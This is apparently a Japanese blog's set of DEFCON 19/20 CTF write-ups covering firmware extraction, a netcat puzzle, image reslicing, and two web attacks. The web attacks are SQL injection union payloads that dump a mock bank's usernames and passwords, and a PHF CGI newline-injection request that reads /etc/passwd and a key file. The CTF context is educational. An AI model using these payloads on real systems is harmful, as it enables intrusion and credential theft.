6月 5

DEFCON 20 CTF Forensic 300(f300) writeup

問題文: Please get my key back!
Challenge File

まずはダウンロードしてきたChallenge Fileの種類を調査。
# file for300-47106ef450c4d70ae95212b93f11d05d
for300-47106ef450c4d70ae95212b93f11d05d: data

data…

仕方がないので直接中身を眺めます。

ファームウェアっぽい?
この中から何かを取り出さなければ何もはじまらない。
ってことで「firmware-mod-kit」の「extract-ng.sh」問題ファイルを食わせてみます。
(firmware-mod-kitについての説明はココ参照。)

# ./extract-ng.sh for300-47106ef450c4d70ae95212b93f11d05d
Firmware Mod Kit (build-ng) 0.76 beta, (c)2011 Craig Heffner, Jeremy Collake http://www.bitsum.com 
Firmware-Mod-Kit has not been built yet. Building...
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
 
--------------- SNIP ----------------
 
Extracting 983180 bytes of header image at offset 0
Extracting squashfs file system at offset 983180
Extracting squashfs files...
Firmware extraction successful!
Firmware parts can be found in 'fmk/*'

取り出せた模様。
中身はこんな感じです。
# ls
bin dev etc home htdocs lib mnt proc sbin sys tmp usr var www

よく分からないのでディレクトリ内を手当たり次第調査していると明らかに怪しい名前のテキストが見つかったので中身をチェックします。
# cd home/
# ls
dlink
# cd dlink/
# ls
key.txt
# cat key.txt
ewe know, the sh33p always preferred Linksys

このテキストに書かれた内容でCORRECT!

あとで「firmware-mod-kit」の出力結果にあったログを見て分かったのですがbin-walkというツールがあるんですね。
単体で今回の問題ファイルを食わせてみたら以下のような出力を得ました。
# binwalk for300-47106ef450c4d70ae95212b93f11d05d
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
108 0x6C LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3008436 bytes
983148 0xF006C PackImg Tag, little endian size: 14690560 bytes; big endian size: 2744320 bytes
983180 0xF008C Squashfs filesystem, little endian, version 4.0, size: 724610815 bytes, 1470 inodes, blocksize: 0 bytes, created: Sat Mar 6 20:29:04 1993

今回はファームウェアっぽいといだけで「firmware-mod-kit」を使ったわけですが、本来はこのように調査してLZMAであるなどということが分かった上で進めていくのが模範的なんでしょうかねー

Category: ctf | DEFCON 20 CTF Forensic 300(f300) writeup はコメントを受け付けていません。
6月 4

DEFCON 20 CTF GrabBag 400(gb400) writeup

問題文: What is Jeff Moss’ checking account balance?
Bank site = http://140.197.217.85:8080/boa_bank
User:blacksheep
Password:luvMeSomeSheep

リンク先にアクセスすると早速Basic認証がお出迎えしてくれるので問題文にあるUser/Passwordで認証を行います。
すると下図の通り銀行(に模したサイト)「Baaaaaaank Of America」のサイトにアクセスできます。

Webサイトで個人(ここではJeff Moss)の情報をとなればSQL Injection。
ということでアタックできそうなポイントを探します。
zipコードにより支店を検索するところに「'(シングルクォート)」を入力してみると
下図のようにエラーを表示します。

テーブル情報を入手するためにSQL文を実行させます。

‎0 union select table_name,'0','0','0','0','0' from information_schema.tables

ずらずらずらっとでてきます。ここの情報を参考にさらにSQL文を実行していきます。

0 union SELECT column_name,'0','0','0','0','0' FROM information_schema.columns WHERE table_name ='customer'

いい感じ♪

ここまできたらユーザ名とパスワードを。
0 union SELECT username,password,'0','0','0','0' FROM customer
これでユーザ名とパスワードの一覧表が取得できるはずですが、出力の際に「<」や「>」などがあると
ブラウザ上での表示がされない場合があるのでソースコードで確認します。

「jeff moss」こと「dark tangent」のものと思われる
ユーザ名「dtangent」とそのパスワード「erl(<qZsxZ」が見つかりました。



このアカウント情報を利用して「My Baank」からログインを行います。


ログインに成功し、情報を見ることができました。

問題文は「What is Jeff Moss’ checking account balance?」ですので
「checking」の最新の数値である「0.00」で正解。

問題文の「balance」の意味がよく分からず一番下に表示されている数値「-3160.86」を入力しても
正解となりました。正解したからいいものの、これはどう見るべきものだったのかは分からずじまいでしたw

Category: ctf | DEFCON 20 CTF GrabBag 400(gb400) writeup はコメントを受け付けていません。
6月 7

DEFCON 19 CTF GrabBag 100(gb100) writeup – カンニング版

問題文: pwn583.ddtek.biz:5932

普通に接続しても何もでないので
ブラウザで接続してみる。
すると以下のレスポンスが返ってきました。
0000 00 1f 16 1e 5e 50 00 19 e2 40 64 75 08 00 45 00 ....^[email protected]
0010 01 43 97 5e 40 00 2f 06 11 eb 8c c5 d4 a5 7d ce .C.^@./.......}.
0020 c2 32 17 2c 2f 34 ce b6 67 e7 01 bc 33 c4 50 18 .2.,/4..g...3.P.
0030 00 6c d8 ef 00 00 48 54 54 50 2f 31 2e 31 20 34 .l....HTTP/1.1 4
0040 30 38 20 54 6f 6f 20 73 6c 6f 77 0d 0a 44 61 74 08 Too slow..Dat
0050 65 3a 20 4d 6f 6e 2c 20 32 33 20 4d 61 79 20 32 e: Mon, 23 May 2
0060 30 30 35 20 32 32 3a 33 38 3a 33 34 20 47 4d 54 005 22:38:34 GMT
0070 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 ..Server: Apache
0080 2f 31 2e 33 2e 33 2e 37 20 28 55 6e 69 78 29 20 /1.3.3.7 (Unix)
0090 28 52 65 64 2d 48 61 74 2f 4c 69 6e 75 78 29 0d (Red-Hat/Linux).
00a0 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 .Last-Modified:
00b0 57 65 64 2c 20 30 38 20 4a 61 6e 20 32 30 30 33 Wed, 08 Jan 2003
00c0 20 32 33 3a 31 31 3a 35 35 20 47 4d 54 0d 0a 45 23:11:55 GMT..E
00d0 74 61 67 3a 20 22 33 66 38 30 66 2d 31 62 36 2d tag: "3f80f-1b6-
00e0 33 65 31 63 62 30 33 62 22 0d 0a 41 63 63 65 70 3e1cb03b"..Accep
00f0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d t-Ranges: bytes.
0100 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a .Content-Length:
0110 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 0..Connection:
0120 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 close..Content-T
0130 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 ype: text/html;
0140 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d charset=UTF-8...
0150 0a
408 Too slow?
Server: Apache/1.3.3.7?

気になった単語で調べてみると
このレスポンスは色々なところで例として紹介されていました。
ココとか。
思いつく単語を回答に使ってみるも不正解。。。

そして、レスポンスコード408はココに書かれている通り
Request Timeoutを表す。うーん。。。

遅すぎるよ。と言われているので通信の高速化について調べてみた結果
「The Chromium Project」に「SPDY」というものがあることを発見。

ということでChromeをSDPYモードで起動してみる。<chrome --use-spdy=no-sslそして、再度、ブラウザにて接続。
なんか出た。

「充分早いけど、充分良いわけではない。」
だそうです。
まだ、何か足りないようです。

色々文字列をくっつけてリクエストしてみると。
以下のような変化あり。


「私がそんなバカだと思っているのか?」
と軽く怒られました。
そんなことじゃないってことですね。

といったところでCTF中はこの先に進むことはできませんでした。
ここからはwriteupを公開されていた人のサイトを参考に。
えーまーカンニングですねw

実はこのサーバはPHFの脆弱性を抱えていたそうです。
その脆弱性はphfの脆弱性で1996年に公表されたもの…

ということでこの脆弱性を利用したリクエスト「/etc/passwd」を読み出し。pwn583.ddtek.biz:5932/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd
以下のように内容を読みだせたようです。root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Tkf6zKZd:x:1000:1000::/home/Tkf6zKZd:/bin/sh
一番下のユーザがいかにもですね。
次にこのユーザのホームディレクトリにあるファイルを読みだす。
そのときのリクエストは以下の通りだそうです。pwn583.ddtek.biz:5932/cgi-bin/phf?Qalias=%0A/bin/cat%20/home/Tkf6zKZd/ke*するとkeyファイルの中身が表示されると。that's fast enough now go take a rest

答えは
「that’s fast enough now go take a rest」

なるほど。
keyという文字列を含むリクエストをしたとき
はじくようなメッセージを返してきたのはこのためだったんですね。

言われてみれば100の問題って感じはします。
でも、ここに辿り着けなかったんですよね。
普通に検査としてこのサーバの相手をしたのであれば落とせた気がします。
CTF中は、そもそも頭の中に「脆弱性を利用」なんてなかったです。
ほんと、猛烈に反省です。

最新っぽい技術「SPDY」を使った上で15年ほど前の脆弱性を利用する・
ほんと、よくできた問題だとと思います。

脱帽。

Category: ctf | DEFCON 19 CTF GrabBag 100(gb100) writeup – カンニング版 はコメントを受け付けていません。
6月 6

DEFCON 19 CTF GrabBag 200(gb200) writeup

問題文: Play the game running at pwn522.ddtek.biz:6000, password: Never$olv3d!
超訳:pwn522.ddtek.biz:6000で稼働しているゲームで遊べ。パスワード:Never$olv3d!

指定されたアドレスのサーバ、ポートで遊べとのことなのでnetcatで接続。[email protected]:~/ctf$ nc -vv pwn522.ddtek.biz 6000
Connection to pwn522.ddtek.biz 6000 port [tcp/*] succeeded!
接続はできたっぽいですが、特に何も起きない…
パスワードも教えていただいていることですし、入力してみる。[email protected]:~/gb200$ nc -vv pwn522.ddtek.biz 6000
Connection to pwn522.ddtek.biz 6000 port [tcp/*] succeeded!
Never$olv3d!
000111222333444555000111222333444555000111222333444555
なんか出ました。
色々、試してみました。[email protected]:~/gb200$ nc pwn522.ddtek.biz 6000
Never$olv3d!
000111222333444555000111222333444555000111222333444555
aaa
314000121243311552304513520230543253005142540214524314
000
invalid msg
これ以降は「invalid msg」と言われまくり。3回目というのがポイント?
よく分からないので色々試していると以下のような結果。[email protected]:~/gb200$ echo -e 'Never$olv3d!' | nc -vv pwn522.ddtek.biz 6000
Connection to pwn522.ddtek.biz 6000 port [tcp/*] succeeded!
000111222333444555000111222333444555000111222333444555
005011502155432323101512523133043452243544004451322041
210011502321432324400512523133043454315550104451322045
342011102445432320101512223133043455500551304451322045
513011502055432321004512423133043455012123404451322045
005011502155432323101512523133043452243544004451322041
210011502321432324400512523133043454315550104451322045
342011102445432320101512223133043455500551304451322045
513011502055432321004512423133043455012123404451322045
005011502155432323101512523133043452243544004451322041
210011502321432324400512523133043454315550104451322045
342011102445432320101512223133043455500551304451322045
513011502055432321004512423133043455012123404451322045
005011502155432323101512523133043452243544004451322041
210011502321432324400512523133043454315550104451322045
342011102445432320101512223133043455500551304451322045
513011502055432321004512423133043455012123404451322045
005011502155432323101512523133043452243544004451322041
210011502321432324400512523133043454315550104451322045
342011102445432320101512223133043455500551304451322045
513011502055432321004512423133043455012123404451322045
005011502155432323101512523133043452243544004451322041
210011502321432324400512523133043454315550104451322045
Sorry
いっぱいでて、謝られましたよ。
「Sorry」は、もちろん答えではありませんでした。

色々な制御文字を入れたりしてみましたが反応なし。
制御文字に続いて色々入力していると以下のような反応が返ってきました。
[email protected]:~/gb200$ echo -e 'Never$olv3d!\nxx' | nc -vv pwn522.ddtek.biz 6000
Connection to pwn522.ddtek.biz 6000 port [tcp/*] succeeded!
000111222333444555000111222333444555000111222333444555
000111222333444555000111222333444555000111222333444555
Let's not be too rough on our own ignorance; it's what makes America great!

よく分からないまま、出てきた文字列
「Let’s not be too rough on our own ignorance; it’s what makes America great!」
で正解。

なんか、今回は個人的に手探り感満載でした。
この問題に関しては「GrabBag」だし、アリはアリでしょうかね?w

Category: ctf | DEFCON 19 CTF GrabBag 200(gb200) writeup はコメントを受け付けていません。
6月 6

DEFCON 19 CTF Forensics 100(f100) writeup

問題文: Find the key
超訳:キーをみつけて。

問題ファイル

問題ファイルが何かを確認。
PNGであると判明したのでファイル名も変更。
[email protected]:~/ctf$ file f100_fb8149b6f6eaef95d38
f100_fb8149b6f6eaef95d38: PNG image, 19025 x 1, 8-bit/color RGBA, non-interlaced
pen[email protected]:~/ctf$ mv f100_fb8149b6f6eaef95d38 f100.png
ということで画像を見てみます。

なにやらすっごく細長いので
拡大して色々なところを眺めます。
すると何やら色々な縦線に紛れて
青い線が等間隔(450ごと)に存在することを発見。

これを等間隔に切って縦に繋いでいくpythonスクリプトを作成

#!/usr/bin/python
import Image
ct = 450
buf = 10
oldImg = Image.open("f100.png")
newImg = Image.new("RGB", (ct + buf, oldImg.size[0]/ct + buf), "#FFFFFF")
y = 0
for i in range(oldImg.size[0]):
    newImg.putpixel((i % ct, y), oldImg.getpixel((i, 0)))
    if i % ct == 0:
        y += 1
newImg.save("new_f100.jpg")

これで生成された画像を見てみると
下図のようになります。
(右端に水色の線が一本になっていることから綺麗に縦に繋がったことが分かると思います。)

答えは
「thankYouSirPleasemayIhaveAnother」

Category: ctf | DEFCON 19 CTF Forensics 100(f100) writeup はコメントを受け付けていません。